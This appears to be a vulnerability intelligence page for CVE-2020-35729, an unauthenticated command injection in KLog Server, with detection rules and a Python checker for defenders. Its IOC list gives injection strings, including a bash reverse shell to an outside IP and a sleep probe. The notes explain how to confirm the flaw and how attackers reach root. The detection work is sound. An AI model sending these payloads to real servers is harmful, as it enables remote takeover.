CVE-2020-35729
published 2020-12-27

CVE-2020-35729: KLog Server 2.4.1 allows OS command injection via shell metacharacters in the actions/authenticate.php user parameter.

Priority: P1 (84), critical
CVSS 3.1 base score: 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 87.99% (99.7th percentile)

Affected (1 range)

Vendor: klogserver
Product: klog_server
Version range: (not listed)
Fixed in: (not listed)

Detection & IOCs (extracted from sources)

path: /actions/authenticate.php
command: user=|22|unsafe+
command: user=|22|
command: unsafe+%22%26sleep+40%26%22
command: test"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&"
url: https://10.10.56.51:443/actions/authenticate.php

Snort rule (sid 2031590):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS Possible KLOG Server RCE Inbound (CVE-2020-35729)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"user=|22|"; startswith; content:"%22%26"; fast_pattern; reference:url,docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection; reference:cve,2020-35729; classtype:attempted-admin; sid:2031590; rev:1; metadata:attack_target Server, created_at 2021_01_29, cve CVE_2020_35729, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_01_29;)

Snort rule (sid 2031591):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET WEB_SPECIFIC_APPS KLOG Server RCE Public POC Inbound - Possible Scanning (CVE-2020-35729)"; flow:established,to_server; http.method; content:"POST"; http.request_body; content:"user=|22|unsafe+"; startswith; fast_pattern; reference:url,docs.unsafe-inline.com/0day/klog-server-unauthentication-command-injection; reference:cve,2020-35729; classtype:attempted-admin; sid:2031591; rev:1; metadata:attack_target Server, created_at 2021_01_29, cve CVE_2020_35729, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2021_01_29;)
  • Monitor for HTTP POST requests to /actions/authenticate.php containing shell metacharacters (e.g., %22%26, double-quote and ampersand) in the `user` POST body parameter, which is the injection point.
  • A non-302 HTTP response to a POST to /actions/authenticate.php indicates the target is vulnerable; a 302 redirect indicates it is not. Use this response-code delta for detection/confirmation.
  • Blind command injection can be confirmed via a time-delay check: inject `sleep` into the `user` parameter and observe response latency (40-second sleep used in public PoC).
  • The exploit runs commands as the `apache` user; however, the sudo configuration allows apache to run any command as root without a password, so post-exploitation process trees rooted at apache with sudo/root children are highly suspicious.
  • The Metasploit module uses a wget-based cmdstager (flavor: :wget) to deliver the payload; monitor for wget processes spawned by the apache user following a POST to authenticate.php.
  • The exploit URL-encodes spaces as `+` and forward slashes as `%2F`, and replaces semicolons with `%0A`; look for these encoding patterns in POST bodies targeting authenticate.php.
  • The nuclei PoC detection uses a base64-encoded canary: POST body contains `echo "cHJvamVjdGRpc2NvdmVyeS5pbw==" | base64 -d` and checks for `poc-testing` in the response.
  • The exploit uses SSL (HTTPS) by default on port 443; detection rules or network sensors must inspect TLS-decrypted traffic to match the POST body patterns.
  • The Snort rules carry 'confidence Medium' metadata, meaning they may produce false positives in environments where legitimate applications POST to similarly named endpoints.
  • The vulnerability affects KLog Server versions 2.4.1 and prior; the CPE scope is cpe:2.3:a:klogserver:klog_server:2.4.1.
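As an added example (not code from the page's sources or from the KLog Server project), the following Python checker applies the detection notes above to logged POST requests: it mirrors the two ET rule conditions on the raw body, then decodes the `user` value the way the server would (`+`, `%2F`, `%0A`) and flags shell metacharacters in it. The function names and the sample records are constructed for this example.

```python
"""Flag CVE-2020-35729 injection attempts in logged HTTP POST requests.

Heuristics, in order of specificity:
  1. body starts with user="unsafe+   -> public PoC marker (ET sid 2031591)
  2. body starts with user=" and holds %22%26 -> encoded quote+ampersand (ET sid 2031590)
  3. decoded `user` value contains any shell metacharacter -> generic catch
"""
import re
from urllib.parse import parse_qs

TARGET_PATH = "/actions/authenticate.php"
# Double quote and ampersand are what the PoC relies on; the rest are the
# other common shell separators. Expect some noise on exotic usernames.
SHELL_META = re.compile(r'["&;|`\n$(){}<>]')


def inspect_request(method: str, path: str, body: str) -> dict:
    """Return {'suspicious': bool, 'rule': str|None, 'user': decoded value|None}."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return {"suspicious": False, "rule": None, "user": None}
    # Raw-body checks as in the ET rules (literal quote, as the rule's |22|);
    # the percent-encoded form of the quote is an added variant.
    if body.startswith('user="unsafe+') or body.startswith("user=%22unsafe+"):
        return {"suspicious": True, "rule": "public-poc-marker", "user": None}
    # parse_qs splits on the *literal* '&' first, so an encoded %26 inside the
    # user value survives into the decoded string, as does %0A (newline).
    user = parse_qs(body, keep_blank_values=True).get("user", [""])[0]
    if SHELL_META.search(user):
        rule = "encoded-quote-ampersand" if "%22%26" in body else "shell-metacharacter"
        return {"suspicious": True, "rule": rule, "user": user}
    return {"suspicious": False, "rule": None, "user": user}


# Constructed sample records (method, path, body); not real captures.
SAMPLE_LOG = [
    ("POST", "/actions/authenticate.php", "user=admin&pass=Secret1"),
    ("POST", "/actions/authenticate.php", "user=%22%26sleep+40%26%22&pass=x"),
    ("POST", "/actions/authenticate.php", 'user="unsafe+%22%26id%26%22&pass=x'),
    ("GET", "/actions/authenticate.php", ""),
    ("POST", "/actions/login.php", "user=%22%26id%26%22"),
]


def scan(records):
    """Return (index, rule) for every suspicious record in the log."""
    hits = []
    for i, rec in enumerate(records):
        verdict = inspect_request(*rec)
        if verdict["suspicious"]:
            hits.append((i, verdict["rule"]))
    return hits
```

Pair the request-side hit with the non-302 response heuristic and with apache-spawned `sh`/`wget`/`sudo` process events to raise confidence before paging anyone.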

CVSS provenance

NVD, CVSS v3.1: 9.8 CRITICAL, vector CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
NVD, CVSS v2.0: 10.0 CRITICAL, vector AV:N/AC:L/Au:N/C:C/I:C/A:C